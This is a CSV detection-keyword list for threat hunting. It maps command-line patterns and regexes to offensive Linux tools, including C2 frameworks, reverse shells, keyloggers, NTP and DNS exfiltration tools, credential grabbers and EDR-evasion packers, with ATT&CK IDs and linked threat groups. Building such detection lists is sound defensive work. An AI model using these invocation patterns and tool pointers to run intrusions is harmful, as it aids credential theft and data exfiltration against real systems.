"*./logger.sh * &> /dev/null && exit*",".{0,1000}\.\/logger\.sh\s.{0,1000}\s\&\>\s\/dev\/null\s\&\&\sexit.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#linux","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","4164"
"*./lse.sh*",".{0,1000}\.\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","4165"
"*./manjusaka*",".{0,1000}\.\/manjusaka.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/manjusaka","1","1","#linux","N/A","10","10","818","150","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z","4166"
"*./Microsploit*",".{0,1000}\.\/Microsploit.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","1","#linux","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","4167"
"*./monkey.sh*",".{0,1000}\.\/monkey\.sh.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","#linux","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","4168"
"*./msfinstall*",".{0,1000}\.\/msfinstall.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","https://x.com/mthcht/status/1827714529687658796","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","4169"
"*./mythic-cli *",".{0,1000}\.\/mythic\-cli\s.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1059 - T1105 - T1219 - T1573 - T1071","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/MythicAgents/tetanus","1","0","#linux","N/A","N/A","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","4170"
"*./Ninja.py*",".{0,1000}\.\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","#linux","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","4172"
"*./nps install *",".{0,1000}\.\/nps\sinstall\s.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","4174"
"*./ntdissector*",".{0,1000}\.\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","#linux","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","4175"
"*./nysm/src/",".{0,1000}\.\/nysm\/src\/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1057 - T1570","TA0005 - TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/eeriedusk/nysm","1","0","#linux","N/A","10","3","246","39","2023-12-20T13:59:17Z","2023-09-25T10:03:52Z","4176"
"*./Obfuscated_*.py*",".{0,1000}\.\/Obfuscated_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#linux","N/A","10","","N/A","","","","4177"
"*./obfuscator -i *.ps1*",".{0,1000}\.\/obfuscator\s\-i\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","psobf","PowerShell Obfuscator","T1027 - T1059 - T1564","TA0005","N/A","N/A","Defense Evasion","https://github.com/TaurusOmar/psobf","1","0","#linux","N/A","6","2","171","30","2024-06-07T02:50:43Z","2024-06-07T01:45:12Z","4178"
"*./pachine.py*",".{0,1000}\.\/pachine\.py.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","#linux","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","4179"
"*./Passdetective*",".{0,1000}\.\/Passdetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","#linux","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","4180"
"*./Pcredz *",".{0,1000}\.\/Pcredz\s.{0,1000}","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","#linux","N/A","N/A","10","2100","413","2025-01-27T10:34:00Z","2014-04-07T02:03:33Z","4181"
"*./peass.rb*",".{0,1000}\.\/peass\.rb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#linux","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","4182"
"*./PEzor.sh*",".{0,1000}\.\/PEzor\.sh.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","#linux","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","4183"
"*./Phishing.sh*",".{0,1000}\.\/Phishing\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","4184"
"*./pwndrop *",".{0,1000}\.\/pwndrop\s.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","4185"
"*./PyShell *",".{0,1000}\.\/PyShell\s.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/JoelGMSec/PyShell","1","0","#linux","N/A","N/A","4","309","60","2024-09-27T11:11:56Z","2021-10-19T07:49:17Z","4186"
"*./recv -d :50001*",".{0,1000}\.\/recv\s\-d\s\:50001.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","4187"
"*./RedGuard*",".{0,1000}\.\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","#linux","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","4188"
"*./redirector.py *",".{0,1000}\.\/redirector\.py\s.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","#linux","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","4189"
"*./reverse-ssh*",".{0,1000}\.\/reverse\-ssh.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#linux","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","4190"
"*./rotateproxy*",".{0,1000}\.\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#linux","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","4191"
"*./rpcrt.py*",".{0,1000}\.\/rpcrt\.py.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/yuanLink/CVE-2022-26809","1","1","#linux","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z","4192"
"*./rsockstun*",".{0,1000}\.\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","#linux","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","4193"
"*./rsocx -*",".{0,1000}\.\/rsocx\s\-.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#linux","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","4194"
"*./rwf.py*",".{0,1000}\.\/rwf\.py.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","#linux","N/A","10","2","192","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z","4196"
"*./scan4all *",".{0,1000}\.\/scan4all\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","4197"
"*./scan4all*",".{0,1000}\.\/scan4all.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoC","T1595 - T1190 - T1068","TA0001 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","#linux","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","4198"
"*./ScareCrow *",".{0,1000}\.\/ScareCrow\s.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","10","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","4199"
"*./ScareCrow -*",".{0,1000}\.\/ScareCrow\s\-.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","4200"
"*./ScareCrow*",".{0,1000}\.\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","#linux","N/A","N/A","10","2805","513","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z","4201"
"*./send -d *:123 -f *",".{0,1000}\.\/send\s\-d\s.{0,1000}\:123\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","Black Basta","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","138","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z","4202"
"*./seth.sh * *",".{0,1000}\.\/seth\.sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","#linux","N/A","9","10","1423","323","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z","4203"
"*./ShellPwnsh*",".{0,1000}\.\/ShellPwnsh.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#linux","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","4204"
"*./slip.py *",".{0,1000}\.\/slip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/0xless/slip","1","0","#linux","N/A","10","2","100","4","2025-04-11T18:36:31Z","2022-10-29T15:38:36Z","4205"
"*./sliver-client_linux*",".{0,1000}\.\/sliver\-client_linux.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#linux","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","4206"
"*./snaffler_downloads*",".{0,1000}\.\/snaffler_downloads.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","#linux","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","4207"
"*./snake",".{0,1000}\.\/snake","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","4208"
"*./SourcePoint *",".{0,1000}\.\/SourcePoint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","#linux","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","4209"
"*./sshimpanzee*",".{0,1000}\.\/sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","#linux","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","4210"
"*./sudomy*",".{0,1000}\.\/sudomy.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","4212"
"*./t14m4t *",".{0,1000}\.\/t14m4t\s.{0,1000}","offensive_tool_keyword","t14m4t","Automated brute-forcing attack tool.","T1110","N/A","N/A","N/A","Credential Access","https://github.com/MS-WEB-BN/t14m4t","1","0","#linux","N/A","N/A","5","402","81","2021-04-02T09:52:45Z","2019-10-16T14:39:33Z","4213"
"*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","0","#linux","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","4214"
"*./teamserver *",".{0,1000}\.\/teamserver\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4215"
"*./update-beef*",".{0,1000}\.\/update\-beef.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","4218"
"*./Vegile*",".{0,1000}\.\/Vegile.{0,1000}","offensive_tool_keyword","BruteSploit","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Vegile","1","1","#linux","N/A","N/A","8","726","164","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z","4219"
"*./vulmap/*",".{0,1000}\.\/vulmap\/.{0,1000}","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability Scanner","https://github.com/vulmon/Vulmap","1","0","N/A","N/A","10","10","965","194","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z","4220"
